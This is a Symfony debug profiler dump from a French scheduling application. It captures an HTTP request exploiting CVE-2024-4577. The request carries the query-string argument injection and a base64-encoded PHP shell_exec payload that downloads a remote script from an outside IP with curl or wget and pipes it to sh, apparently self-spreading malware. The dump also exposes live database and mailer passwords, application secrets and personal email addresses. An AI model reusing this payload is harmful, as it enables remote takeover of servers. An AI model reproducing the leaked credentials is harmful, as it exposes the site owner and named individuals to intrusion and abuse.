n/a
Request
GET Parameters
| Key | Value |
|---|---|
| url | "hello.world" |
| �d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
| Key | Value |
|---|---|
| <?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
No attributes
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| connection | "keep-alive" |
| content-length | "225" |
| content-type | "application/x-www-form-urlencoded" |
| host | "51.159.55.97:443" |
| upgrade-insecure-requests | "1" |
| user-agent | "Custom-AsyncHttpClient" |
| x-php-ob-level | 1 |
Request Content
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Sun, 16 Mar 2025 13:59:48 GMT" |
| x-debug-token | "b9f2a8" |
| x-debug-token-link | "https://51.159.55.97/_profiler/95fa11" |
| x-previous-debug-token | "95fa11" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
| Key | Value |
|---|---|
| Created | "Sun, 16 Mar 25 14:59:48 +0100" |
| Last used | "Sun, 16 Mar 25 14:59:48 +0100" |
| Lifetime | "0" |
Session Attributes
| Attribute | Value |
|---|---|
| DBName | "default" |
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| AFFICHE_INFO_ERREUR | "false" |
| APP_ENV | "dev" |
| APP_SECRET | "07cb6b3ce4cd22ad7caf4c2d757e1f7a" |
| MAILER_DEV_DEST | "luc.gilot@sfr.fr" |
| MAILER_ENCRYPTION | "" |
| MAILER_HOST_NOUV | "in-v3.mailjet.com" |
| MAILER_PASSWORD_NOUV | "9f2f56419387819baaf43b572a08bc23" |
| MAILER_PORT_NOUV | "587" |
| MAILER_SENDER_ADDRESS | "luc.gilot@wanadoo.fr" |
| MAILER_SENDER_NAME | "PAA" |
| MAILER_SMTP_NOUV | "smtp" |
| MAILER_USERNAME_NOUV | "9a3e29bd175f209dfd2dab5534589e97" |
| MONOLOG_RECIPIENT | "luc.gilot@sfr.fr" |
| URL_SERVEUR_EDITIONS | "192.168.0.100/ServiceImpressionVFPWeb/" |
| baseURL | "http://51.159.55.97/PAA/Recette/public/" |
| baseURLJS | "http://51.159.55.97/PAA/Recette/public/" |
| doctrine_database_driver | "pdo_pgsql" |
| doctrine_database_host | "51.159.55.97" |
| doctrine_database_name | "ORT_Recette_2" |
| doctrine_database_password | "__eM75&pTTUFgCzT" |
| doctrine_database_port | "5429" |
| doctrine_database_user | "PAA_LIMOOG" |
| editions_ModelePlanXL | "modeleplanxl.xls" |
| editions_PlanningIndividuelXL_LstFeuilles | "Modèle" |
| editions_RepFichiersGeneres | "D:\PAA50\Editions" |
| editions_RepFichiersModeles | "C:\Program Files\PAA\" |
| enseignantPoseSeanceDivers | "0" |
| estDemo | "false" |
| estPucette | "false" |
| locale | "fr" |
| paa_version | "6.5.c.03" |
| paa_version_date | "12/11/2024" |
| paa_version_interne | "77" |
| secret | "2001LimooG01700" |
| session_max_idle_time | "1200" |
| skin_choice | "skin.css" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| BASE | "/public" |
| CONTENT_LENGTH | "225" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/html/PAA/Recette/" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/html/PAA/Recette/" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_HOST | "51.159.55.97:443" |
| HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
| HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
| PHP_SELF | "/public/index.php" |
| QUERY_STRING | "url=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| REDIRECT_HTTPS | "on" |
| REDIRECT_QUERY_STRING | "url=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| REDIRECT_REDIRECT_HTTPS | "on" |
| REDIRECT_REDIRECT_REDIRECT_HTTPS | "on" |
| REDIRECT_REDIRECT_REDIRECT_STATUS | "200" |
| REDIRECT_REDIRECT_STATUS | "200" |
| REDIRECT_STATUS | "200" |
| REDIRECT_URL | "/index.php" |
| REMOTE_ADDR | "46.189.131.3" |
| REMOTE_PORT | "47714" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1742133588 |
| REQUEST_TIME_FLOAT | 1742133588.0868 |
| REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
| SCRIPT_FILENAME | "/var/www/html/PAA/Recette/public/index.php" |
| SCRIPT_NAME | "/public/index.php" |
| SERVER_ADDR | "51.159.55.97" |
| SERVER_ADMIN | "[no address given]" |
| SERVER_NAME | "51.159.55.97" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "<address>Apache/2.4.25 (Debian) Server at 51.159.55.97 Port 443</address>\n" |
| SERVER_SOFTWARE | "Apache/2.4.25 (Debian)" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,AFFICHE_INFO_ERREUR,paa_version,paa_version_interne,paa_version_date,baseURL,baseURLJS,locale,session_max_idle_time,estDemo,estPucette,editions_RepFichiersModeles,editions_ModelePlanXL,editions_RepFichiersGeneres,editions_PlanningIndividuelXL_LstFeuilles,doctrine_database_driver,doctrine_database_host,doctrine_database_port,doctrine_database_name,doctrine_database_user,doctrine_database_password,MAILER_SMTP_NOUV,MAILER_HOST_NOUV,MAILER_PORT_NOUV,MAILER_ENCRYPTION,MAILER_USERNAME_NOUV,MAILER_PASSWORD_NOUV,MAILER_DEV_DEST,MAILER_SENDER_ADDRESS,MONOLOG_RECIPIENT,MAILER_SENDER_NAME,secret,URL_SERVEUR_EDITIONS,skin_choice,enseignantPoseSeanceDivers" |
| USER | "www-data" |
| proxy-nokeepalive | "1" |
Sub Requests 1
ErrorController :: showAction (token = 95fa11)
| Key | Value |
|---|---|
| _controller | "App\PaaBundle\Controller\ErrorController::showAction" |
| exception |
|
| logger |
|